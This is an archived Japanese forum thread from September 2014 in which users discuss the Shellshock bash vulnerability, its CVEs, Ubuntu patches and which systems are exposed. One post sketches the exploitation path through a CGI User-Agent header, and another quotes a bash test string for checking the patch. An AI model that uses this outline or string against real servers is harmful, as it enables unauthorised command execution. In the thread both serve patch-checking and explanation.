432 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 08:40:02.91 ID:Rl1RHJ780
HTML - CGI
https://www.shodan.io/report/plt4tqpk

無差別にpingしてるのは調査のためだったのね
意外と日本は少ないな<CGI利用

433 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 09:22:16.80 ID:+eHVMkcD0
うん? ウブンツに今3回目のbash更新が来た?

434 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 09:34:30.07 ID:+eHVMkcD0
1回目:CVE-2014-6271
ttps://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.1
2回目:CVE-2014-7169
ttps://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.2
3回目:CVE-2014-7186・CVE-2014-7187
ttps://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.4

別の問題対策ってことなんかな

435 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 09:49:23.82 ID:2hAHmbJz0
「インターネットの終末の日」や「パーソナル端末の終末の日」が頭をかすめる秋(Bashバグとかゲームオーバーゼウスとか etc……)
ttp://oka-jp.seesaa.net/article/406073759.html

436 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 10:21:21.09 ID:Rl1RHJ780
もうすでに乗っ取られてbot化したか、バックドア開けられてる鯖、
それなりの数になってるんだろうなあ、、、

437 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 11:19:37.77 ID:Ngu58ce+0
ubuntu13.10使っててサポート切れでアップデートできません→
しょうがないから14.04にアップグレードするかぁ、今回のやつ致命的だしパッチ当てられないの
まずいよねー
ってやったらアップグレード失敗(なんか途中でfontファイル壊れてるってインストール中
ずっといってた)
表示は正常終了ってなていたけど失敗だったみたい
14.04一応立ち上げてみるもタスクバー出なかったりキーボードの文字が正しく打てなかったり
んでいろいろ調べつつ対処しつつ何回かリブートとかシャットダウンとか端末からしてたら
突然ブートローダーからubuntuに入ったとたんスクリプトが上からダーッって流れてきて
ヤバって思ったけどPCのスタートボタン長押しで強制終了させるのはもっとヤバイと思って
そのまま呆然としつつ放置してたら突然PCが落ちた
vistaとデュアルブートだったんでvistaたちあげて(vista立ち上げるの2ヶ月ぶり)
とりあえずvistaのほうの起動確認、HDDの状態確認してこっちのほうは見たところ
大丈夫だったんでそのままPC落として飯食って寝た

その後ubuntuの中のデーターで救出しときたいデーター(といってもwineで動かしてた
戦国ランスのちょうどおもしろくなってきたセーブデータとfirefoxのブックマークくらいか)
を救出できんかねーとおもってubuntuのデュアルブートのセーフモード?的なところから
ログインできるかな?と思ってログインしてみたらログイン成功
とりあえず戦国ランスのセーブデータとブックマークのエクスポートした奴
別のwin7に飛ばしてそのままubuntuシャットダウン
とりあえずしばらくは静観かねぇどうせサブPCだし、でも正直スクリプト流れ出した時は
肝が冷えたししばらくは触りたくない、騒動がおさまるくらいまではって感じ
いやーひどいめにあったわーほんと

438 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 11:25:25.78 ID:+eHVMkcD0
んー、アップデートの供給考えると、やっぱLTSの方がおすすめね。

439 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 11:33:03.10 ID:upWXehhmi
ftp立ち上げておけば
忠告してくれる文化があるとかなんとかどこかの大学のサーバで読んだな
実際やってるかどうかは知らない

440 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 11:44:32.47 ID:9nH9FGlx0
sshでログインできるような環境にしか影響ないだろ?
しかもそういう環境のはSELinuxでやってるから任意実行できてもアクセスできないような
system(3)実行できるようなcgiとかやらないし
shellってなんかしらの特権プロセスとかじゃいよね?

441 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 11:45:42.11 ID:PLrOTPHh0
Windows+Weblogic+oracleみたいのしかサポートしないワイ高みの見物
隣のチームは金曜から火を吹いてるが

442 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 11:55:55.15 ID:gQWx7Fq30
Androidは大丈夫なのかな?

443 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 12:09:48.09 ID:+eHVMkcD0
>>442
Androidは標準シェルがadb shellで、bashじゃないから大丈夫じゃないの

444 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 12:11:50.22 ID:gAhO+nie0
>>440
SSH関係ないし別にSELinuxはちゃんとした防御にならんだろ。
shebangでの指定含めたbash(RHEL だとshも)が
ユーザ入力が環境変数に入ってる状態で起動されるとアウト。
shの起動は予測できないよなあ

445 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 12:32:54.03 ID:TuGhJDFQ0
adb shellっていうシェルだと思ってるようなやつが得意気に語るもんだw

446 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 12:33:47.52 ID:lPZdsiXn0
>>444
SELinuxはそりゃないよりはマシであるものの、
例えばショッピングサイトで顧客の情報ファイルを cat で読み出されてしまうような攻撃はおそらく防御できない・・・と思われる

ないよりはマシ、あると攻撃の幅が狭まる。

SSHでログインできる環境にしか影響ないだろ?なんてのはアホ

447 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 12:35:51.59 ID:9nH9FGlx0
>>444
>ユーザ入力が環境変数に入ってる状態で起動されるとアウト。
本質はここか

環境変数って便利なんだろうが、プロセス間で渡すために使うのってシステムとして汚い気がする
その場で消えるレジストリみたいなもんだよね 揮発性レジストリは確かあるし
ちゃんとプロセス間で直接データ渡すか一旦型が確定したオブジェクトとしてカーネルで管理させるべき

448 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 12:38:44.66 ID:aMfqSPJL0
OSXに対するアップル社の公式パッチがまだ提供されていないから、
非公式に対応してユーザーがOSも含めて動作確認するしか無いのか
アップル社はいつ対応するのだろうか

449 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 12:40:57.14 ID:3fnuI0SY0
CGIモードでPHP動いてる格安レン鯖とかはやばそう

450 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 12:42:40.27 ID:x+eQWdmB0
>>434
三回目もあるのか!!

451 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 12:48:49.91 ID:CsGvGKxa0
OS-X(ML)のhttpd.conf見たらphpとかデフォルトで動いてるみたいだけど、apache立ち上げてたらヤバイ?
高度なサービスとか高度なUNIXユーザとかAppleも株価対策か変な言葉使ってる。
ターミナルでコマンドライン叩くのが高度にあたるのかな。

452 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 12:52:02.40 ID:nFaSp+sT0
>>451
Homebrew入れてればbash更新ってそんなに面倒じゃないから
やっとくといいよ。

453 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 13:00:07.03 ID:CsGvGKxa0
>>452
れす、ありがとう
homebrewやmacportとか幾つもやり方があって混乱するんだよね,
iiOSで圏外になるとかとんでもないアップデート出してるから不安

454 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 13:01:00.92 ID:+ZGxGOBc0
マジかよ3年起動してないからどうでもいいわ

455 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 13:27:54.35 ID:cUL2IhNF0
Shell Shockを解説するとこんな感じ?

【用意するもの】
・古いbashが使われている標的のWebサーバー
・シェルコマンドを呼び出しているCGIプログラム
 (PHPならsystem/exec、Pythonならos.system/os.popen、rubyは全部(/usr/bin/env bash))
・ユーザーエージェントを改変できるWebブラウザ

【手順】
1. Webブラウザのユーザーエージェント内に魔法の言葉を入れる
2. Webブラウザから標的サーバーに置いてあるCGIプログラムを閲覧する
3. 結果を見る

456 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 13:39:44.15 ID:RXv4qsIR0
2つ目のパッチ当てたけど、自分の実力ではこれで大丈夫なのかがわからない
これは通っても大丈夫なのか?

env X='() { (a)=>\' bash -c "echo Vulnerable"

99 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)